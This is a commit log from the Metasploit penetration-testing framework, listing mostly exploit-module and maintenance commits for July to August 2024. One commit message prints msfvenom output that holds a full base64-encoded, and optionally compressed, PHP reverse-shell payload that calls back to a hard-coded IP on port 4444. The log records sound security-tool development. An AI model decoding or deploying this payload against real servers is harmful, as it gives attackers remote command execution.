Code cleanup
2024-08-13 23:18:26 +01:00
h4x-x0r c53e5d3c4e Code cleanup and added store_valid_credential
added store_valid_credential
code cleanup
2024-08-13 23:12:50 +01:00
h4x-x0r 733e2ab9fc Added store_valid_credential
Added store_valid_credential
2024-08-13 23:00:13 +01:00
jvoisin 18ee2cde77 Add the possibility the compress the payload in encoders/php/base64
Without compression:

```console
$ ./msfvenom -p php/reverse_php -e php/base64
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4040 (iteration=0)
php/base64 chosen with final size 4040
Payload size: 4040 bytes
eval(base64_decode('ICAgIC8qPD9waHAgLyoqLwogICAgICBAZXJyb3JfcmVwb3J0aW5nKDApO0BzZXRfdGltZV9saW1pdCgwKTtAaWdub3JlX3VzZXJfYWJvcnQoMSk7QGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7CiAgICAgICRkaXM9QGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CiAgICAgIGlmKCFlbXB0eSgkZGlzKSl7CiAgICAgICAgJGRpcz1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCcsJywkZGlzKTsKICAgICAgICAkZGlzPWV4cGxvZGUoJywnLCRkaXMpOwogICAgICAgICRkaXM9YXJyYXlfbWFwKCd0cmltJywkZGlzKTsKICAgICAgfWVsc2V7CiAgICAgICAgJGRpcz1hcnJheSgpOwogICAgICB9CiAgICAgIAogICAgJGlwYWRkcj0nMTAwLjExOS4xOTcuMjEnOwogICAgJHBvcnQ9NDQ0NDsKCiAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdlbXJvckVjdFlWZWYnKSl7CiAgICAgIGZ1bmN0aW9uIGVtcm9yRWN0WVZlZigkYyl7CiAgICAgICAgZ2xvYmFsICRkaXM7CiAgICAgICAgCiAgICAgIGlmIChGQUxTRSAhPT0gc3RyaXN0cihQSFBfT1MsICd3aW4nICkpIHsKICAgICAgICAkYz0kYy4iIDI.chr(43).JjFcbiI7CiAgICAgIH0KICAgICAgJER5Rk89J2lzX2NhbGxhYmxlJzsKICAgICAgJGVrTXV5WkY9J2luX2FycmF5JzsKICAgICAgCiAgICAgIGlmKCREeUZPKCdwb3BlbicpJiYhJGVrTXV5.WkYoJ3BvcGVuJywkZGlzKSl7CiAgICAgICAgJGZwPXBvcGVuKCRjLCdyJyk7CiAgICAgICAgJG89TlVMTDsKICAgICAgICBpZihpc19yZXNvdXJjZSgkZnApKXsKICAgICAgICAgIHdoaWxlKCFmZW9mKCRmcCkpewogICAgICAgICAgICAkby49ZnJlYWQoJGZwLDEwMjQpOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAcGNsb3NlKCRmcCk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdzaGVsbF9leGVjJykmJiEkZWtNdXlaRignc2hlbGxfZXhlYycsJGRpcykpewogICAgICAgICRvPWAkY2A7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdwcm9jX29wZW4nKSYmISRla011eVpGKCdwcm9jX29wZW4nLCRkaXMpKXsKICAgICAgICAkaGFuZGxlPXByb2Nfb3BlbigkYyxhcnJheShhcnJheSgncGlwZScsJ3InKSxhcnJheSgncGlwZScsJ3cnKSxhcnJheSgncGlwZScsJ3cnKSksJHBpcGVzKTsKICAgICAgICAkbz1OVUxMOwogICAgICAgIHdoaWxlKCFmZW9mKCRwaXBlc1sxXSkpewogICAgICAgICAgJG8uPWZyZWFkKCRwaXBlc1sxXSwxMDI0KTsKICAgICAgICB9CiAgICAgICAgQHByb2NfY2xvc2UoJGhhbmRsZSk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdleGVjJykmJiEkZWtNdXlaRignZXhlYycsJGRpcykpewogICAgICAgICRvPWFycmF5KCk7CiAgICAgICA.gZXhlYygkYywkbyk7CiAgICAgICAgJG89am9pbihjaHIoMTApLCRvKS5jaHIoMTApOwogICAgICB9ZWxzZQogICAgICBpZigkRHlGTygnc3lzdGVtJykmJiEkZWtNdXlaRignc3lzdGVtJywkZGlzKSl7CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBzeXN0ZW0oJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICBpZigkRHlGTygncGFzc3RocnUnKSYmISRla011eVpGKCdwYXNzdGhydScsJGRpcykpewogICAgICAgIG9iX3N0YXJ0KCk7CiAgICAgICAgcGFzc3RocnUoJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICB7CiAgICAgICAgJG89MDsKICAgICAgfQogICAgCiAgICAgICAgcmV0dXJuICRvOwogICAgICB9CiAgICB9CiAgICAkbm9mdW5jcz0nbm8gZXhlYyBmdW5jdGlvbnMnOwogICAgaWYoaXNfY2FsbGFibGUoJ2Zzb2Nrb3BlbicpYW5kIWluX2FycmF5KCdmc29ja29wZW4nLCRkaXMpKXsKICAgICAgJHM9QGZzb2Nrb3BlbigidGNwOi8vMTAwLjExOS4xOTcuMjEiLCRwb3J0KTsKICAgICAgd2hpbGUoJGM9ZnJlYWQoJHMsMjA0OCkpewogICAgICAgICRvdXQgPSAnJzsKICAgICAgICBpZihzdWJzdHIoJG.MsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgICBjaGRpcihzdWJzdHIoJGMsMywtMSkpOwogICAgICAgIH0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1aXQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewogICAgICAgICAgYnJlYWs7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAkb3V0PWVtcm9yRWN0WVZlZihzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgZndyaXRlKCRzLCRub2Z1bmNzKTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGZ3cml0ZSgkcywkb3V0KTsKICAgICAgfQogICAgICBmY2xvc2UoJHMpOwogICAgfWVsc2V7CiAgICAgICRzPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7CiAgICAgIEBzb2NrZXRfY29ubmVjdCgkcywkaXBhZGRyLCRwb3J0KTsKICAgICAgQHNvY2tldF93cml0ZSgkcywic29ja2V0X2NyZWF0ZSIpOwogICAgICB3aGlsZSgkYz1Ac29ja2V0X3JlYWQoJHMsMjA0OCkpewogICAgICAgICRvdXQgPSAnJzsKICAgICAgICBpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgICBjaGRpcihzdWJzdHIoJGMsMywtMSkpOwogICAgICAgIH0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1a.XQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewogICAgICAgICAgYnJlYWs7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAkb3V0PWVtcm9yRWN0WVZlZihzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgQHNvY2tldF93cml0ZSgkcywkbm9mdW5jcyk7CiAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAc29ja2V0X3dyaXRlKCRzLCRvdXQsc3RybGVuKCRvdXQpKTsKICAgICAgfQogICAgICBAc29ja2V0X2Nsb3NlKCRzKTsKICAgIH0K'));
$
```

With compression:

```console
$ ./msfvenom -p php/reverse_php -e php/base64
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1617 (iteration=0)
php/base64 chosen with final size 1617
Payload size: 1617 bytes
eval(gzuncompress(base64_decode('eJztVm1v2zYQ.chr(47).p5fQRtCSGWabaUGts7jlqBIsaFZE8zZh64rWJk6xWxlUiUpxEbb.chr(47).z5QbxYtdykw7NtswLLvnjvdPffoaIQQmp79.chr(43).HOxLtD07Gx6gqrXBWitNNNQKG2FvCezcHFhwDIrNsBysRG2Mol7qTSw0oBmyUppS2JnlYIZsARvki2DLfDSCiWrWBzNwkVzkyAVhlbgewdOhUlWObCslNzhDe6QIiMj2BR2R1xMGH5s7E2OQsO9qzVPOBA8fR2hN99MceTeFX7hw2Fb5CoF8iV.chr(47).onWyY5ukINhqsTkAfYbcwMcjEWQPaa7VJRBFkqaa4ng2m8Tx00n89LvJeYxrcOAIpvP5fL44OWlbbRlgsBXGGoJ3Lwp79QHvG28RqPaQgPc4uc.chr(47).VKsmryvaddUwi8vzyenmFRpQiY7UwVpPbX27ZzTJC.chr(43).EFIjMIQ9frjNOCTMTr.chr(47).6TT.chr(43).S44PWwzyd6.chr(47).ubhTFwjCe5LmbIO4G.chr(47).OftK7WjWEhWMdQ59mNt4gl2MsHh6emoDmoM0WDe6pBshBySBDwKVH.chr(43).Sir5TQhK.chr(43).1iSehc45ab57kzxSillDnrNBQT3zsbLeBvztY5kLrThTBUgv8d46zLtOZJoD7SCuz5qA.chr(43).hMXogAcYY3DyLc8HLOEUeB.chr(43).GJ.chr(43).ol39cX.chr(43).8ND2uRAxlloDJSo1.chr(47).Hb.chr(47).pFuZgJzTQk6R4QxbPzeS.chr(47).t5.chr(43).7bRVU8z5UB0vTz.chr(43).Ah2xsLGp782DShSK2Zsom1fETXWPRVen2rlNg3jSlqQ1vQj1IqBTBnPIZHk0fKKxBi71qU.chr(47).xtb4VSW26P.chr(43).wyKHQviCyrKBFKy6npH8Qh8iIMEyDUaXmQIKs8JXhiefQ6QknKw4l0xdNXz6NdLLiaMveQzjz91Pn0mBLLVGgfH.chr(47).9GUjl9qmhWKpqmaD9.EbRol3JvvxGcGcXf1.chr(47).QmMh21.chr(43).63vOGA5MPSic5Kx5cUP06l.chr(47).Ioyj6jDomqypDHhLmInOZ.chr(47).Pv.chr(47).a1TWkQRxt58TLlyOz3g0Sx6EiJKEeYpwt4k.chr(43).DoVuod8En0bh.chr(47).2nFzmGq9Oin25ep.chr(47).tQCovRp0.chr(47).oiA.chr(43).2wuL.chr(43).AYLQSkPyvpfbP0DrNmhzkPUz.chr(43).iXV4nZQSrMkN3AgrexBCwuOpnaeXvCgjONq62VRpR2c6FmjxTa314ubsRuxe3o1JBbI5XP268uru2h58.chr(43).wFW979fnX5W7S8uWZ3z2671F2IkhK4rW5d.chr(47).2U40EML7CocezcbD4XTRvyvn6.chr(47).Qz4DefyOjYTJV2shYnbst65Q1kFangwOFnfwNAM8OCw')));
$
```

Let's not enable it by default as it relies on having php compiled with zlib by
default, which might not be available on come exotic setups.
2024-08-13 23:10:04 +02:00
h4x-x0r 14e4a11d24 Added store_valid_credential
Added store_valid_credential
2024-08-13 20:54:56 +01:00
Spencer McIntyre e812463d5f Add some better formatting 2024-08-13 15:48:41 -04:00
h4x-x0r 39d615e8d2 Added TARGETURI option
Added TARGETURI option
2024-08-13 20:29:30 +01:00
jheysel-r7 47e5d62ade Update modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb 2024-08-13 08:48:33 -07:00
jheysel-r7 e04e22bc30 Apply suggestions from code review 2024-08-13 08:40:20 -07:00
adeherdt-r7 a3a24418a8 MS-9517 Jenkins Login Scanner
Jenkins does not implement Authentication challenges.

By default, Jenkins responds with a HTTP 403 FORBIDDEN response, and does not include the `WWW-Authenticate` header.
This causes problems with the underlying http client, as this one expects the challenge to come forward and resend
the request with the auth header.

By changing the code to look for the HTTP 403 response, and setting the default URL to the correct login validation endpoint
Pro will have an easier time to investigate whether Jenkins can be bruteforced or not.

The original code checks for a 401 response only.
Overwriting the behavior for Jenkins allows us to handle this use-case properly and report the correct behavior.
2024-08-13 11:16:01 +02:00
Takah1ro 38b9278f42 Add document 2024-08-12 09:21:18 +09:00
h4x-x0r 26d6347919 Code cleanup
Code cleanup
2024-08-11 06:15:24 +01:00
h4x-x0r 5fa18a66ee Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
2024-08-11 05:41:07 +01:00
Takah1ro 79f5c8ed3d Remove HttpUsername and HttpPassword options 2024-08-10 12:06:20 +09:00
Takah1ro be4764885a Fix and Rubocop formatting 2024-08-10 12:01:32 +09:00
Takah1ro 0ffe335660 Add module docs 2024-08-10 10:59:00 +09:00
h4x-x0r 8a72124e9d Code cleanup and error handling added
Code cleanup and error handling added
2024-08-09 21:11:20 +01:00
jvoisin d28fb4cbb6 Fix php/base64 encoder
Having things like `'abcde.chr(43).fgh'` doesn't fly, but `'abcde'.chr(43).'fgh'` does.
2024-08-09 12:07:39 -07:00
h4x-x0r 4384d32c83 Cisco SSM On-Prem Account Takeover (CVE-2024-20419)
Cisco SSM On-Prem Account Takeover (CVE-2024-20419)
2024-08-09 18:59:54 +01:00
Takah1ro cf15124cc8 Add not null check 2024-08-09 15:34:14 +09:00
Takah1ro 2363f8416c Fix Reliability 2024-08-09 12:57:01 +09:00
Takah1ro c36c2eea38 Separate modules 2024-08-09 08:51:14 +09:00
h4x-x0r 8bef9b5f72 Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
2024-08-08 17:52:38 +01:00
Metasploit 233f6dc4d2 Bump version of framework to 6.4.22 2024-08-08 03:38:47 -05:00
Takah1ro 064d463c37 Formatting doc 2024-08-08 07:45:16 +09:00
Metasploit 6fcd06b36d automatic module_metadata_base.json update 2024-08-07 17:11:51 -05:00
bwatters baca8723c1 Land #19357, Calibre Python Code Injection (CVE-2024-6782)
Merge branch 'land-19357' into upstream-master
2024-08-07 16:46:16 -05:00
h4x-x0r 8e4503061a Removed debugging code
Removed debugging code
2024-08-07 15:23:15 +01:00
Takah1ro 35354c8407 Update document 2024-08-07 21:20:09 +09:00
Takah1ro a92b51904a Update document 2024-08-07 21:16:32 +09:00
h4x-x0r 8732d7cd58 LG Simple Editor Command Injection (CVE-2023-40504) Module
Exploit Module and Documentation for the LG Simple Editor Command Injection (CVE-2023-40504)
2024-08-07 05:16:25 +01:00
Takah1ro 1f68919a42 Fail if optional but required option not set 2024-08-07 13:01:23 +09:00
Takah1ro f168246796 Correct vulnerable version
<=v2.6.3 == <v2.8.1
2024-08-07 12:49:17 +09:00
Takah1ro a57678c8d3 Formatting 2024-08-07 08:51:22 +09:00
Takah1ro 4e99e7dfe7 Use Vulnerable when lfi 2024-08-07 08:50:42 +09:00
Takah1ro 92e2694ac5 Use Detected instead of Appears 2024-08-07 08:46:44 +09:00
Takah1ro b7e4247d22 Avoid using CVE as option 2024-08-07 08:43:57 +09:00
Takah1ro c71894f3c4 Remove unnecessary DefaultOptions 2024-08-07 08:21:15 +09:00
h00die-gr3y 8b3392a756 changed check to Appears when vulnerable 2024-08-06 21:00:06 +00:00
Corey 2437000b99 Rubocop changes 2024-08-06 15:23:03 -04:00
dwelch-r7 f3214d67db Land #19355, Fix migrate to pass the debug_build flag 2024-08-06 17:21:16 +01:00
Zach Goldman 29bfc1cca6 add necessary metadata for bruteforce 2024-08-06 10:02:58 -05:00
Ivan Nikolskiy be90a4e3fd Restore r0 on each iteration 2024-08-06 00:01:58 +02:00
Ivan Nikolskiy ae8e996c46 Restore r0 on each iteration 2024-08-06 00:01:06 +02:00
Ivan Nikolskiy 9436e0011f Put sockfd to r0
r0 has return value instead of sockfd in second loop interation
2024-08-05 23:51:22 +02:00
Spencer McIntyre a1a59cff78 Load from the user's module store 2024-08-05 12:31:51 -04:00
Spencer McIntyre 233cd61c86 Check dependencies when loading 2024-08-05 12:07:57 -04:00
Spencer McIntyre 32d242c5d2 Initial commit of the fzuse plugin 2024-08-05 10:50:18 -04:00
dwelch-r7 8fa437eda4 Land #19365, Update pcaprub dependency to 0.13.3 2024-08-05 12:22:48 +01:00
adfoster-r7 21cb88e510 Update pcaprub dependency to 0.13.3 2024-08-05 11:59:25 +01:00
Takah1ro b487dadf8c Remove explicit return 2024-08-05 13:01:11 +09:00
Takah1ro ab38c83d9c Update module document 2024-08-05 08:51:56 +09:00
Takah1ro 93f1362d22 Add module document 2024-08-05 08:47:29 +09:00
Takah1ro 0251f1bd8d Rubocop formatting 2024-08-04 22:10:15 +09:00
Takah1ro 729ecc588a Formatting lfi output 2024-08-04 22:07:53 +09:00
Takah1ro ca0dba1844 Add LFI 2024-08-04 22:02:37 +09:00
Takah1ro a5009cd5ff Add RCE 2024-08-04 21:43:17 +09:00
Takah1ro 7a233f0049 Update CVE-2023-6019 module 2024-08-04 21:07:05 +09:00
Takah1ro 122767cc59 Implement CVE-2023-6019 module 2024-08-04 10:49:11 +09:00
h4x-x0r 1390251e87 Code cleanup
Updated code for version detection and exploit invocation
2024-08-03 05:13:33 +01:00
h00die-gr3y 8f0d22ded4 Fourth release module and documentation 2024-08-02 21:04:50 +00:00
Jack Heysel 75c737dabe Responded to comments 2024-08-02 10:47:53 -07:00
Corey 6c7c1cf603 Fix missing comma in opts, remove dbugging in plist_path 2024-08-02 12:19:55 -04:00
Corey 9036132b18 Update targets to include apple silicon (AARCH64) 2024-08-02 12:05:23 -04:00
h4x-x0r 35cbf63890 Minor fixes
Specified a default payload
Randomized date and time
Wrapped cleanup in an ensure block
2024-08-02 16:58:24 +01:00
h4x-x0r 2ce0a7a3fd v7.15 Support added
Updated to work with v7.15 too.
2024-08-02 15:43:26 +01:00
Corey 94d4e17d3e Use optenum properly 2024-08-02 10:19:50 -04:00
h4x-x0r 4e8f27b70e Merge branch 'my_awesome_branch' of https://github.com/h4x-x0r/metasploit-framework into my_awesome_branch 2024-08-02 06:18:57 +01:00
h4x-x0r c8eb919af8 rm calibre
rm calibre
2024-08-02 06:18:34 +01:00
h4x-x0r 7784448995 Delete modules/exploits/multi/misc/calibre_exec.rb 2024-08-02 00:16:01 -05:00
h4x-x0r 2b8f52bed6 Delete documentation/modules/exploit/multi/misc/calibre_exec.md 2024-08-02 00:15:16 -05:00
h4x-x0r 6dbb264a0d Calibre Python Code Injection (CVE-2024-6782)
New Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
2024-08-02 06:03:15 +01:00
h4x-x0r 025354b0ef Calibre Python Code Injection (CVE-2024-6782)
Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
2024-08-02 05:56:46 +01:00
h4x-x0r 7bafe1cabc Delete modules/exploits/multi/misc/calibre_exec.rb 2024-08-01 23:30:31 -05:00
h4x-x0r 6e3f95fd3a Delete documentation/modules/exploit/multi/misc/calibre_exec.md 2024-08-01 23:29:34 -05:00
h4x-x0r 80961b0fef Merge branch 'rapid7:master' into my_awesome_branch 2024-08-01 22:57:36 -05:00
h4x-x0r 6aa4d2e806 Documentation for Exploit Module Calibre Python Code Injection (CVE-2024-6782) 2024-08-01 23:56:33 -04:00
h4x-x0r 1fbeb4e223 Exploit Module for Calibre Python Code Injection (CVE-2024-6782) 2024-08-01 23:55:47 -04:00
Adithya Chiluka 28535ae277 Update README.md 2024-08-01 22:39:42 +05:30
Corey 133e6db77e Add dynamic plist path from opts 2024-08-01 11:54:38 -04:00
Corey f3d935ef07 add references to Objective-See and Apple Docs 2024-08-01 11:49:11 -04:00
Corey 7da83a1358 Add opts, update description for daemons 2024-08-01 11:47:29 -04:00
dledda-r7 bcbbc91621 fix(core): fix migrate to pass the debug_build flag.
Co-authored-by: dwelch-r7 <dean_welch@rapid7.com>
2024-08-01 09:27:12 -04:00
Metasploit 52fb857b99 Bump version of framework to 6.4.21 2024-08-01 03:40:03 -05:00
h00die-gr3y 75b3afb0ce Third release module and documentation 2024-07-31 14:34:44 +00:00
Metasploit 951a33082d automatic module_metadata_base.json update 2024-07-31 09:02:53 -05:00
dledda-r7 48c69b99fb Land #19344, FortiClient EMS FCTID SQLi to RCE fix for 7.2.x 2024-07-31 09:43:19 -04:00
Metasploit 4b8e2b6b1a automatic module_metadata_base.json update 2024-07-31 06:08:41 -05:00
Christophe De La Fuente 24c8a2bf5f Land #19331, Update empire_skywalker module 2024-07-31 12:27:06 +02:00
Takah1ro 4f061c87fb Update document 2024-07-31 15:43:03 +09:00
Takah1ro ca75714959 Change all instance of staging_key to @staging_key 2024-07-31 12:54:09 +09:00
Takah1ro a7512f70eb Change all instance of staging_key to @staging_key 2024-07-31 08:47:07 +09:00
Takah1ro 53d74f0777 Use a multi-line string
instead of a big number on one line
2024-07-31 08:27:35 +09:00
Takahiro Yokoyama 1c28150514 Update modules/exploits/linux/http/empire_skywalker.rb
add prepend Msf::Exploit::Remote::AutoCheck at the beginning of the class

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2024-07-31 08:11:44 +09:00
Takahiro Yokoyama 6f4ff80a38 Update modules/exploits/linux/http/empire_skywalker.rb
formatting issue

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2024-07-31 08:09:40 +09:00
Takahiro Yokoyama a35a2c1814 Update modules/exploits/linux/http/empire_skywalker.rb
formatting issue

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2024-07-31 08:08:25 +09:00
Takahiro Yokoyama 13f5d971ed Update modules/exploits/linux/http/empire_skywalker.rb
use a multi-line string instead of a big number on one line

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2024-07-31 08:04:39 +09:00
h4x-x0r 2d9aed7ec3 fixed typo 2024-07-30 13:39:03 -04:00
h4x-x0r 341142dc23 DIAEnergie SQL Injection (CVE-2024-4548) Module 2024-07-30 13:28:10 -04:00
h4x-x0r cd1c100bd8 DIAEnergie SQL Injection (CVE-2024-4548) Module Documentation 2024-07-30 13:21:34 -04:00
Jack Heysel d7ae1b5463 Minor fixes 2024-07-30 09:19:12 -07:00
Metasploit e600f199ac automatic module_metadata_base.json update 2024-07-30 11:08:13 -05:00
Christophe De La Fuente ba7c7b6456 Land #19298, OpenMediaVault authenticated RCE [CVE-2013-3632] 2024-07-30 17:40:39 +02:00
Jack Heysel 075ce28c5a Base64 encoded ARCH_CMD payload 2024-07-30 08:19:08 -07:00
Jack Heysel 464f0b2d48 Apache HugeGraph Gremlin RCE (CVE-2024-27348) 2024-07-29 14:08:38 -07:00
h00die-gr3y b3ce0ad4ed Second release module and documentation 2024-07-29 16:15:17 +00:00
h00die-gr3y e11e8cdd74 first release module 2024-07-29 14:48:00 +00:00
h00die-gr3y c94dc8f28c changes based on cdelafuente-r7 comments 2024-07-29 14:02:29 +00:00
Takah1ro 706dc60f6e Use built-in Diffie-Hellman 2024-07-27 12:13:52 +09:00
Takahiro Yokoyama 598498832c Merge branch 'rapid7:master' into master 2024-07-27 09:21:28 +09:00
redwaysecurity.com a812617fee Removed "ssl_restore = true" 2024-07-26 17:30:25 +02:00
Takah1ro ebcd7e0e33 rubocop formatting 2024-07-26 23:44:46 +09:00
h00die-gr3y 2175af9c3f update with Msf::Exploit::Deprecated mixin 2024-07-26 14:28:53 +00:00
Metasploit 45e105e219 automatic module_metadata_base.json update 2024-07-26 09:26:42 -05:00
dledda-r7 2989c9ed1b Land #19337, MySCADA MyPRO Command Injection module 2024-07-26 10:07:19 -04:00
Takahiro Yokoyama d5ce191ceb Merge branch 'rapid7:master' into master 2024-07-26 21:51:30 +09:00
Takah1ro 393aed445d Formatting 2024-07-26 21:14:51 +09:00
Takah1ro b5c4fd0e32 use the same instance
OpenSSL::Digest.new('sha256')
2024-07-26 21:05:59 +09:00
Takah1ro 5ee86967e5 Pass a Hash as argument 2024-07-26 20:59:54 +09:00
Takah1ro bff7e48e3c Avoid code duplication 2024-07-26 20:44:18 +09:00
Takah1ro 10b723751b Avoid code duplication 2024-07-26 13:11:26 +09:00
h4x-x0r 14945679ba Updated email generation part. 2024-07-25 23:54:27 -04:00
Takah1ro 0b9b7a49e7 Add response check 2024-07-26 08:48:45 +09:00
Takah1ro b0689971b6 Fix to_bytes 2024-07-26 08:38:14 +09:00
Takah1ro ed0720dcfd Separate write_file function 2024-07-26 08:32:32 +09:00
Takah1ro ae95bb6c0f Fix build_routing_packet 2024-07-26 08:22:57 +09:00
Takah1ro b1e304a61f Fix match 2024-07-26 08:16:30 +09:00
Heyder Andrade 10e4668e68 Update lib/msf/core/exploit/remote/http_server.rb
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com>
2024-07-25 19:05:48 +02:00
Jack Heysel 2ffe027eab Responded to comments 2024-07-25 09:14:27 -07:00
Metasploit 65c5680238 automatic module_metadata_base.json update 2024-07-25 08:38:18 -05:00
adfoster-r7 b70652df93 Land #19343, Update rubocop target ruby version 2024-07-25 14:12:20 +01:00
Metasploit 03ef015f61 Bump version of framework to 6.4.20 2024-07-25 03:37:00 -05:00
h4x-x0r d3c2177228 Merge branch 'my_awesome_branch' of github.com:h4x-x0r/metasploit-framework into my_awesome_branch 2024-07-24 23:50:18 -04:00
h4x-x0r c0c81475aa Merge branch 'master' of github.com:h4x-x0r/metasploit-framework into my_awesome_branch 2024-07-24 23:48:00 -04:00
h4x-x0r 90ed8ae797 Revised the code to make it cleaner 2024-07-24 22:40:26 -04:00
h4x-x0r c8feb5c5e6 Updated formatting 2024-07-24 22:40:00 -04:00
h4x-x0r ddc13bc58f Update modules/exploits/windows/scada/mypro_cmdexe.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-07-24 20:52:40 -05:00
Jack Heysel c05aebe248 Formatting 2024-07-24 11:16:26 -07:00
Jack Heysel e9cbb9287c Add support for 7.2.x 2024-07-24 10:45:38 -07:00
Metasploit e505b9559c automatic module_metadata_base.json update 2024-07-24 12:34:40 -05:00
adfoster-r7 8f472b9c61 Land #19338, Kerberos asrep roasting improvements 2024-07-24 18:12:53 +01:00
adfoster-r7 89cf0223d1 Kerberos asrep roasting improvements 2024-07-24 18:01:11 +01:00
Zach Goldman e0c6d1bddd Land #19340, Improve setg SessionLogging support 2024-07-24 12:44:27 -04:00
adfoster-r7 6a31ceb9e6 Improve setg SessionLogging support 2024-07-24 17:22:11 +01:00
adfoster-r7 771e7500a9 Land #19342, Update msftidy logging for older modules 2024-07-24 17:13:43 +01:00
adfoster-r7 62a3f73e70 Update rubocop target ruby version 2024-07-24 16:47:17 +01:00
adfoster-r7 ed5c959fab Update msftidy logging for older modules 2024-07-24 16:45:43 +01:00
Takah1ro 0f6e2a62b5 Fix numbering 2024-07-24 19:27:11 +09:00
Takah1ro 86ae938b1f Add # 2024-07-24 18:55:52 +09:00
Takah1ro b023ebfb7d Add space at EOL 2024-07-24 18:51:23 +09:00
Takah1ro dc60fe8025 Update skywalker.md 2024-07-24 18:49:09 +09:00
h4x-x0r c1bf8df690 Updated the module to take advantage of the check method 2024-07-23 23:52:05 -04:00
h4x-x0r 9bfaf6343a Updated the module to take advantage of the check method 2024-07-23 23:48:32 -04:00
Takah1ro 0fab915abb Update to use original aes_encrypt function 2024-07-24 12:14:16 +09:00
Takah1ro b48a2089cf fix previous commit bug affecting original exploit 2024-07-24 11:55:05 +09:00
Takah1ro 79ad046f56 Refactoring skywalker 2024-07-24 11:42:19 +09:00
Takah1ro eface45c5c Refactoring skywalker 2024-07-24 10:19:03 +09:00
Takah1ro ab0433e95f Update to target both vulnerabilities 2024-07-23 22:21:08 +09:00
dwelch-r7 c4fd2faa3b Land #19339, Update ffi pin version 2024-07-23 13:48:36 +01:00
adfoster-r7 7348f550c4 Update ffi pin version 2024-07-23 13:30:25 +01:00
Takah1ro 61754f3c92 Add cve ref and update broken link 2024-07-23 08:43:45 +09:00
h4x-x0r d7e50cb126 mySCADA MyPRO <= v8.28.0 Command Injection (CVE-2023-28384) exploit module 2024-07-22 16:49:40 -04:00
h4x-x0r 2bdba1a48d Documentation for the MyPRO Command Injection (CVE-2023-28384) Module. 2024-07-22 16:46:37 -04:00
Simon Janusz 1108afb5cb Land #19336, Fix SSH scanner tests when report summary enabled 2024-07-22 15:42:49 +01:00
adfoster-r7 ba52331421 Fix SSH scanner tests when report summary enabled 2024-07-22 11:22:22 +01:00
Takahiro Yokoyama a18ce36459 Update empire_skywalker.md 2024-07-21 09:36:45 +09:00
h00die-gr3y b65c7ecb08 added support for all openmediavault versions (0.1 - 7.4.2-2) 2024-07-20 20:55:33 +00:00
Takahiro Yokoyama ad82481cce Update empire_skywalker.rb 2024-07-20 21:55:39 +09:00
Takahiro Yokoyama 48ea314138 Update empire_skywalker.md 2024-07-20 14:44:15 +09:00
Takahiro Yokoyama ec45763f05 Add empire_skywalker module documentation 2024-07-20 14:10:00 +09:00
Jack Heysel e6f2352248 WIP 2024-07-19 14:43:13 -07:00
Metasploit db5ace8c5f automatic module_metadata_base.json update 2024-07-19 12:55:31 -05:00
bwatters 636c72965c Land #19084, Add CVE-2022-1373 and CVE-2022-2334 exploit chain
Merge branch 'land-19084' into upstream-master
2024-07-19 12:22:25 -05:00
bwatters 1881d4e8b4 commit and sign binary 2024-07-19 12:07:59 -05:00
Metasploit ea868b164c automatic module_metadata_base.json update 2024-07-19 11:42:11 -05:00
bwatters 9b7b1fd16e Land #19313, Ghostscript Command Execution via Format String (CVE-2024-29510)
Merge branch 'land-19313' into upstream-master
2024-07-19 11:24:11 -05:00
Christophe De La Fuente 4d485acb73 Remove Windows target since it doesn't work for now 2024-07-19 16:19:56 +02:00
redwaysecurity.com dc282f5cc4 Cleanup 2024-07-19 12:38:50 +02:00
redwaysecurity.com 117c2b9298 feat: Allow explicit SSL configuration in start_service method
